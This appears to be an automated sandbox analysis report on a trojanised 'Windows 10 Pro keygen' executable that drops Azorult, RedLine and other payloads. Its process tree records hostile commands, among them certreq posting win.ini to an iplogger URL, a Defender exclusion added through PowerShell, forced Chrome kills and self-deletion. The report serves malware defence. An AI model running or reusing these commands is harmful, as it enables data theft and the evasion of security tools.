Analysis

  • max time kernel
    36s
  • max time network
    61s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    09-03-2021 14:22

General

  • Target

    Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe

  • Size

    8.2MB

  • MD5

    456c5963a08824d34303db846ff8bf14

  • SHA1

    c03e0c681008417923c0280a204fe7b54087154b

  • SHA256

    413b1728b45d73f2d18d016edf377a461d58eec8bb662825713666d696cd3cdf

  • SHA512

    6a14d4d6e57964f4fa79787c0badbac4773587874871f2095e01dcf3ab091d78a4892a63b6a74de5363d6e9a80865e4a984d63fe4f8c762b58de1193493754c8

Malware Config

Extracted

Family

azorult

C2

http://kvaka.li/1210776429.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Nirsoft 6 IoCs
  • Executes dropped EXE 23 IoCs
  • Suspicious Office macro 1 IoCs

    Office document equipped with 4.0 macros.

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks for any installed AV software in registry 1 TTPs 53 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 3 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 2 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Writes to the Master Boot Record (MBR) 1 TTPs 3 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 2 IoCs
  • Kills process with taskkill 3 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 60 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe
    "C:\Users\Admin\AppData\Local\Temp\Windows_10_Pro_x64_Includes_keygen_by_KeygenNinja.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4808
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
        keygen-pr.exe -p83fsase3Ge
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:852
        • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
          "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:2248
          • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
            C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
            5⤵
              PID:4544
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
          keygen-step-1.exe
          3⤵
          • Executes dropped EXE
          PID:940
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
          keygen-step-3.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1052
          • C:\Windows\SysWOW64\cmd.exe
            cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2224
            • C:\Windows\SysWOW64\PING.EXE
              ping 1.1.1.1 -n 1 -w 3000
              5⤵
              • Runs ping.exe
              PID:4540
        • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
          keygen-step-4.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of WriteProcessMemory
          PID:1184
          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe
            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
            4⤵
            • Executes dropped EXE
            • Writes to the Master Boot Record (MBR)
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Modifies system certificate store
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:4428
            • C:\Windows\SysWOW64\msiexec.exe
              msiexec.exe /i "C:\Users\Admin\AppData\Local\Temp\gdiview.msi"
              5⤵
              • Enumerates connected drives
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of FindShellTrayWindow
              PID:4636
            • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
              C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 0011 installp1
              5⤵
              • Executes dropped EXE
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of SetThreadContext
              • Checks SCSI registry key(s)
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:216
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:3296
              • C:\Users\Admin\AppData\Roaming\1615299552548.exe
                "C:\Users\Admin\AppData\Roaming\1615299552548.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299552548.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:1072
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:4928
              • C:\Users\Admin\AppData\Roaming\1615299556813.exe
                "C:\Users\Admin\AppData\Roaming\1615299556813.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299556813.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:4768
              • C:\Program Files\Mozilla Firefox\firefox.exe
                "C:\Program Files\Mozilla Firefox\firefox.exe"
                6⤵
                • Suspicious use of SetWindowsHookEx
                PID:1876
              • C:\Users\Admin\AppData\Roaming\1615299562267.exe
                "C:\Users\Admin\AppData\Roaming\1615299562267.exe" /sjson "C:\Users\Admin\AppData\Roaming\1615299562267.txt"
                6⤵
                • Executes dropped EXE
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of SetWindowsHookEx
                PID:2332
              • C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe
                C:\Users\Admin\AppData\Local\Temp\download\ThunderFW.exe ThunderFW "C:\Users\Admin\AppData\Local\Temp\download\MiniThunderPlatform.exe"
                6⤵
                  PID:5720
              • C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe
                C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe 200 installp1
                5⤵
                • Executes dropped EXE
                • Writes to the Master Boot Record (MBR)
                • Checks SCSI registry key(s)
                • Suspicious use of SetWindowsHookEx
                • Suspicious use of WriteProcessMemory
                PID:200
                • C:\Windows\SysWOW64\cmd.exe
                  cmd.exe /c taskkill /f /im chrome.exe
                  6⤵
                    PID:824
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      7⤵
                      • Kills process with taskkill
                      PID:3380
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\AD754B4D3FE2C4EE.exe"
                    6⤵
                      PID:2584
                      • C:\Windows\SysWOW64\PING.EXE
                        ping 127.0.0.1 -n 3
                        7⤵
                        • Runs ping.exe
                        PID:3240
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Setup.exe"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4688
                    • C:\Windows\SysWOW64\PING.EXE
                      ping 127.0.0.1 -n 3
                      6⤵
                      • Runs ping.exe
                      PID:4720
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                  4⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious use of WriteProcessMemory
                  PID:688
                  • C:\Windows\SysWOW64\cmd.exe
                    cmd.exe /c taskkill /f /im chrome.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3144
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /f /im chrome.exe
                      6⤵
                      • Kills process with taskkill
                      PID:4840
                • C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe
                  "C:\Users\Admin\AppData\Local\Temp\RarSFX2\Install.exe"
                  4⤵
                  • Executes dropped EXE
                  PID:1432
                  • C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe
                    "C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe" 0 3060197d33d91c80.94013368 0 101
                    5⤵
                    • Executes dropped EXE
                    • Drops file in Windows directory
                    PID:580
                    • C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe
                      "C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe" 1 3.1615299775.604784bf295d3 101
                      6⤵
                      • Executes dropped EXE
                      • Adds Run key to start application
                      PID:5084
                      • C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe
                        "C:\Users\Admin\AppData\Local\Temp\ZPDTV9DCHF\multitimer.exe" 2 3.1615299775.604784bf295d3
                        7⤵
                        • Executes dropped EXE
                        • Checks for any installed AV software in registry
                        • Maps connected drives based on registry
                        • Enumerates system info in registry
                        • Suspicious behavior: EnumeratesProcesses
                        PID:4432
                        • C:\Users\Admin\AppData\Local\Temp\ecrlkbgctde\k1hzovyitbo.exe
                          "C:\Users\Admin\AppData\Local\Temp\ecrlkbgctde\k1hzovyitbo.exe" testparams
                          8⤵
                          • Executes dropped EXE
                          PID:2072
                          • C:\Users\Admin\AppData\Roaming\geuzlvy2cyy\uf0m2olgx13.exe
                            "C:\Users\Admin\AppData\Roaming\geuzlvy2cyy\uf0m2olgx13.exe" /VERYSILENT /p=testparams
                            9⤵
                              PID:2132
                              • C:\Users\Admin\AppData\Local\Temp\is-OO3LS.tmp\uf0m2olgx13.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-OO3LS.tmp\uf0m2olgx13.tmp" /SL5="$10256,552809,216064,C:\Users\Admin\AppData\Roaming\geuzlvy2cyy\uf0m2olgx13.exe" /VERYSILENT /p=testparams
                                10⤵
                                  PID:188
                            • C:\Users\Admin\AppData\Local\Temp\4jurd5sk4xy\askinstall24.exe
                              "C:\Users\Admin\AppData\Local\Temp\4jurd5sk4xy\askinstall24.exe"
                              8⤵
                              • Executes dropped EXE
                              • Suspicious use of SetWindowsHookEx
                              PID:1008
                              • C:\Windows\SysWOW64\cmd.exe
                                cmd.exe /c taskkill /f /im chrome.exe
                                9⤵
                                  PID:3904
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill /f /im chrome.exe
                                    10⤵
                                    • Kills process with taskkill
                                    PID:4004
                              • C:\Users\Admin\AppData\Local\Temp\dybaft3av3u\amrllnrqtka.exe
                                "C:\Users\Admin\AppData\Local\Temp\dybaft3av3u\amrllnrqtka.exe" /VERYSILENT
                                8⤵
                                  PID:2180
                                  • C:\Users\Admin\AppData\Local\Temp\is-SU2G6.tmp\amrllnrqtka.tmp
                                    "C:\Users\Admin\AppData\Local\Temp\is-SU2G6.tmp\amrllnrqtka.tmp" /SL5="$801D8,870426,780800,C:\Users\Admin\AppData\Local\Temp\dybaft3av3u\amrllnrqtka.exe" /VERYSILENT
                                    9⤵
                                      PID:4932
                                      • C:\Users\Admin\AppData\Local\Temp\is-FJLFM.tmp\winlthst.exe
                                        "C:\Users\Admin\AppData\Local\Temp\is-FJLFM.tmp\winlthst.exe" test1 test1
                                        10⤵
                                          PID:5312
                                    • C:\Users\Admin\AppData\Local\Temp\ir1xacdtd0x\vict.exe
                                      "C:\Users\Admin\AppData\Local\Temp\ir1xacdtd0x\vict.exe" /VERYSILENT /id=535
                                      8⤵
                                        PID:3488
                                        • C:\Users\Admin\AppData\Local\Temp\is-0PHRB.tmp\vict.tmp
                                          "C:\Users\Admin\AppData\Local\Temp\is-0PHRB.tmp\vict.tmp" /SL5="$1026E,870426,780800,C:\Users\Admin\AppData\Local\Temp\ir1xacdtd0x\vict.exe" /VERYSILENT /id=535
                                          9⤵
                                            PID:3304
                                            • C:\Users\Admin\AppData\Local\Temp\is-LCTR2.tmp\wimapi.exe
                                              "C:\Users\Admin\AppData\Local\Temp\is-LCTR2.tmp\wimapi.exe" 535
                                              10⤵
                                                PID:5392
                                          • C:\Users\Admin\AppData\Local\Temp\l21npiloaqu\nxmcnecp1n3.exe
                                            "C:\Users\Admin\AppData\Local\Temp\l21npiloaqu\nxmcnecp1n3.exe" /ustwo INSTALL
                                            8⤵
                                              PID:4764
                                            • C:\Users\Admin\AppData\Local\Temp\4servn3i3bw\chashepro3.exe
                                              "C:\Users\Admin\AppData\Local\Temp\4servn3i3bw\chashepro3.exe" /VERYSILENT
                                              8⤵
                                                PID:4920
                                                • C:\Users\Admin\AppData\Local\Temp\is-VKCFM.tmp\chashepro3.tmp
                                                  "C:\Users\Admin\AppData\Local\Temp\is-VKCFM.tmp\chashepro3.tmp" /SL5="$10258,1478410,58368,C:\Users\Admin\AppData\Local\Temp\4servn3i3bw\chashepro3.exe" /VERYSILENT
                                                  9⤵
                                                    PID:2576
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      "cmd.exe" /c "start https://iplogger.org/1aSny7"
                                                      10⤵
                                                        PID:4620
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"
                                                        10⤵
                                                          PID:4060
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          "cmd.exe" /c certreq -post -config https://iplogger.org/1EaGq7 %windir%\\win.ini %temp%\\2 & del %temp%\\2
                                                          10⤵
                                                            PID:2708
                                                            • C:\Windows\SysWOW64\certreq.exe
                                                              certreq -post -config https://iplogger.org/1EaGq7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\2
                                                              11⤵
                                                                PID:4752
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              "powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1EaGq7"
                                                              10⤵
                                                                PID:2188
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "cmd.exe" /c "start https://iplogger.org/1EaGq7"
                                                                10⤵
                                                                  PID:1760
                                                                • C:\Program Files (x86)\JCleaner\Venita.exe
                                                                  "C:\Program Files (x86)\JCleaner\Venita.exe"
                                                                  10⤵
                                                                    PID:2684
                                                                  • C:\Program Files (x86)\JCleaner\Brava.exe
                                                                    "C:\Program Files (x86)\JCleaner\Brava.exe"
                                                                    10⤵
                                                                      PID:2796
                                                                    • C:\Program Files (x86)\JCleaner\mex.exe
                                                                      "C:\Program Files (x86)\JCleaner\mex.exe"
                                                                      10⤵
                                                                        PID:1300
                                                                  • C:\Users\Admin\AppData\Local\Temp\fasjghy5azf\app.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\fasjghy5azf\app.exe" /8-23
                                                                    8⤵
                                                                      PID:2804
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Program Files (x86)\Still-Sun"
                                                                        9⤵
                                                                          PID:5220
                                                                      • C:\Users\Admin\AppData\Local\Temp\abqt3y0anus\IBInstaller_97039.exe
                                                                        "C:\Users\Admin\AppData\Local\Temp\abqt3y0anus\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                        8⤵
                                                                          PID:2196
                                                                        • C:\Users\Admin\AppData\Local\Temp\3va3rb1nlwk\Setup3310.exe
                                                                          "C:\Users\Admin\AppData\Local\Temp\3va3rb1nlwk\Setup3310.exe" /Verysilent /subid=577
                                                                          8⤵
                                                                            PID:4420
                                                                          • C:\Users\Admin\AppData\Local\Temp\bnu3egp0qqe\bcsxsmzf2n0.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\bnu3egp0qqe\bcsxsmzf2n0.exe" 57a764d042bf8
                                                                            8⤵
                                                                              PID:244
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k "C:\Program Files\Q079LQ99GL\Q079LQ99G.exe" 57a764d042bf8 & exit
                                                                                9⤵
                                                                                  PID:5376
                                                                                  • C:\Program Files\Q079LQ99GL\Q079LQ99G.exe
                                                                                    "C:\Program Files\Q079LQ99GL\Q079LQ99G.exe" 57a764d042bf8
                                                                                    10⤵
                                                                                      PID:5484
                                                                                • C:\Users\Admin\AppData\Local\Temp\54vrbgemuof\vpn.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\54vrbgemuof\vpn.exe" /silent /subid=482
                                                                                  8⤵
                                                                                    PID:232
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md2_2efs.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            • Checks whether UAC is enabled
                                                                            PID:2828
                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                            4⤵
                                                                            • Executes dropped EXE
                                                                            PID:5000
                                                                            • C:\Users\Admin\AppData\Roaming\D893.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\D893.tmp.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              • Suspicious use of SetThreadContext
                                                                              PID:2172
                                                                              • C:\Users\Admin\AppData\Roaming\D893.tmp.exe
                                                                                "C:\Users\Admin\AppData\Roaming\D893.tmp.exe"
                                                                                6⤵
                                                                                • Executes dropped EXE
                                                                                PID:3104
                                                                            • C:\Users\Admin\AppData\Roaming\DA69.tmp.exe
                                                                              "C:\Users\Admin\AppData\Roaming\DA69.tmp.exe"
                                                                              5⤵
                                                                              • Executes dropped EXE
                                                                              PID:840
                                                                    • C:\Windows\system32\msiexec.exe
                                                                      C:\Windows\system32\msiexec.exe /V
                                                                      1⤵
                                                                      • Enumerates connected drives
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      • Suspicious use of WriteProcessMemory
                                                                      PID:4624
                                                                      • C:\Windows\syswow64\MsiExec.exe
                                                                        C:\Windows\syswow64\MsiExec.exe -Embedding 162EF09CA367E3C6B9FA3CB98980368C C
                                                                        2⤵
                                                                        • Loads dropped DLL
                                                                        PID:4784
                                                                    • C:\Users\Admin\AppData\Local\Temp\is-MQ6K4.tmp\vpn.tmp
                                                                      "C:\Users\Admin\AppData\Local\Temp\is-MQ6K4.tmp\vpn.tmp" /SL5="$1027C,15170975,270336,C:\Users\Admin\AppData\Local\Temp\54vrbgemuof\vpn.exe" /silent /subid=482
                                                                      1⤵
                                                                        PID:3952
                                                                      • C:\Users\Admin\AppData\Local\Temp\is-PFBDN.tmp\IBInstaller_97039.tmp
                                                                        "C:\Users\Admin\AppData\Local\Temp\is-PFBDN.tmp\IBInstaller_97039.tmp" /SL5="$30398,14441882,721408,C:\Users\Admin\AppData\Local\Temp\abqt3y0anus\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq
                                                                        1⤵
                                                                          PID:2232
                                                                          • C:\Users\Admin\AppData\Local\Temp\is-SI4BD.tmp\{app}\chrome_proxy.exe
                                                                            "C:\Users\Admin\AppData\Local\Temp\is-SI4BD.tmp\{app}\chrome_proxy.exe"
                                                                            2⤵
                                                                              PID:1000
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              "cmd.exe" /c start http://gemstrue.shop/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=97039
                                                                              2⤵
                                                                                PID:4836
                                                                            • C:\Users\Admin\AppData\Local\Temp\is-QDRUN.tmp\Setup3310.tmp
                                                                              "C:\Users\Admin\AppData\Local\Temp\is-QDRUN.tmp\Setup3310.tmp" /SL5="$103A2,802346,56832,C:\Users\Admin\AppData\Local\Temp\3va3rb1nlwk\Setup3310.exe" /Verysilent /subid=577
                                                                              1⤵
                                                                                PID:4740
                                                                                • C:\Users\Admin\AppData\Local\Temp\is-D1KBQ.tmp\Setup.exe
                                                                                  "C:\Users\Admin\AppData\Local\Temp\is-D1KBQ.tmp\Setup.exe" /Verysilent
                                                                                  2⤵
                                                                                    PID:5796
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-TGK28.tmp\Setup.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-TGK28.tmp\Setup.tmp" /SL5="$204CE,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-D1KBQ.tmp\Setup.exe" /Verysilent
                                                                                      3⤵
                                                                                        PID:5820

                                                                                  Network

                                                                                  MITRE ATT&CK Enterprise v6

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads

                                                                                  • memory/188-179-0x0000000002061000-0x0000000002065000-memory.dmp

                                                                                    Filesize

                                                                                    16KB

                                                                                  • memory/188-184-0x0000000002E61000-0x0000000002E8C000-memory.dmp

                                                                                    Filesize

                                                                                    172KB

                                                                                  • memory/188-192-0x0000000002FE1000-0x0000000002FE8000-memory.dmp

                                                                                    Filesize

                                                                                    28KB

                                                                                  • memory/188-180-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/200-53-0x0000000003610000-0x0000000003ABF000-memory.dmp

                                                                                    Filesize

                                                                                    4.7MB

                                                                                  • memory/200-49-0x0000000010000000-0x000000001033E000-memory.dmp

                                                                                    Filesize

                                                                                    3.2MB

                                                                                  • memory/216-52-0x0000000002D40000-0x00000000031EF000-memory.dmp

                                                                                    Filesize

                                                                                    4.7MB

                                                                                  • memory/232-188-0x0000000000401000-0x0000000000417000-memory.dmp

                                                                                    Filesize

                                                                                    88KB

                                                                                  • memory/244-170-0x00007FFA5D5F0000-0x00007FFA5DF90000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/244-201-0x0000000002FF0000-0x0000000002FF2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/580-82-0x00000000007A0000-0x00000000007A2000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/580-79-0x00007FFA5D5F0000-0x00007FFA5DF90000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/840-125-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/840-137-0x0000000005310000-0x0000000005311000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/840-131-0x0000000005160000-0x0000000005161000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/840-139-0x0000000005430000-0x0000000005432000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/840-135-0x0000000005100000-0x0000000005101000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/840-129-0x00000000055C0000-0x00000000055C1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/840-122-0x0000000071320000-0x0000000071A0E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/840-141-0x0000000007530000-0x0000000007531000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1000-249-0x0000000000400000-0x000000000052D000-memory.dmp

                                                                                    Filesize

                                                                                    1.2MB

                                                                                  • memory/1000-244-0x00000000022B0000-0x00000000023DD000-memory.dmp

                                                                                    Filesize

                                                                                    1.2MB

                                                                                  • memory/1300-223-0x0000000071320000-0x0000000071A0E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/1300-241-0x0000000004BC0000-0x0000000004BC1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1300-231-0x00000000002A0000-0x00000000002A1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1432-71-0x0000000000A50000-0x0000000000A52000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/1432-68-0x0000000000130000-0x0000000000131000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/1432-67-0x00007FFA60160000-0x00007FFA60B4C000-memory.dmp

                                                                                    Filesize

                                                                                    9.9MB

                                                                                  • memory/1876-146-0x000001C64F7E0000-0x000001C64F7E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2072-152-0x0000000000F70000-0x0000000000F72000-memory.dmp

                                                                                    Filesize

                                                                                    8KB

                                                                                  • memory/2072-151-0x00007FFA5D5F0000-0x00007FFA5DF90000-memory.dmp

                                                                                    Filesize

                                                                                    9.6MB

                                                                                  • memory/2132-172-0x0000000000401000-0x000000000040C000-memory.dmp

                                                                                    Filesize

                                                                                    44KB

                                                                                  • memory/2172-130-0x0000000000BC0000-0x0000000000BC1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2172-136-0x0000000000A60000-0x0000000000AA5000-memory.dmp

                                                                                    Filesize

                                                                                    276KB

                                                                                  • memory/2180-159-0x0000000000401000-0x00000000004B7000-memory.dmp

                                                                                    Filesize

                                                                                    728KB

                                                                                  • memory/2188-278-0x0000000007830000-0x0000000007831000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2188-337-0x0000000004413000-0x0000000004414000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2188-273-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2188-253-0x0000000071320000-0x0000000071A0E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2188-264-0x0000000004412000-0x0000000004413000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2188-274-0x0000000007690000-0x0000000007691000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2188-260-0x0000000004410000-0x0000000004411000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2196-197-0x0000000000401000-0x00000000004A9000-memory.dmp

                                                                                    Filesize

                                                                                    672KB

                                                                                  • memory/2232-270-0x00000000007F0000-0x00000000007F1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2248-26-0x0000000002720000-0x00000000028BC000-memory.dmp

                                                                                    Filesize

                                                                                    1.6MB

                                                                                  • memory/2576-183-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2684-247-0x00000000089B0000-0x00000000089BB000-memory.dmp

                                                                                    Filesize

                                                                                    44KB

                                                                                  • memory/2684-227-0x0000000004E70000-0x0000000004E71000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2684-239-0x0000000008950000-0x00000000089AD000-memory.dmp

                                                                                    Filesize

                                                                                    372KB

                                                                                  • memory/2684-211-0x0000000000620000-0x0000000000621000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2684-203-0x0000000071320000-0x0000000071A0E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2796-202-0x0000000071320000-0x0000000071A0E000-memory.dmp

                                                                                    Filesize

                                                                                    6.9MB

                                                                                  • memory/2796-303-0x0000000005D10000-0x0000000005D11000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2796-210-0x0000000002070000-0x0000000002098000-memory.dmp

                                                                                    Filesize

                                                                                    160KB

                                                                                  • memory/2796-217-0x00000000020E2000-0x00000000020E3000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

                                                                                  • memory/2796-213-0x00000000020E0000-0x00000000020E1000-memory.dmp

                                                                                    Filesize

                                                                                    4KB

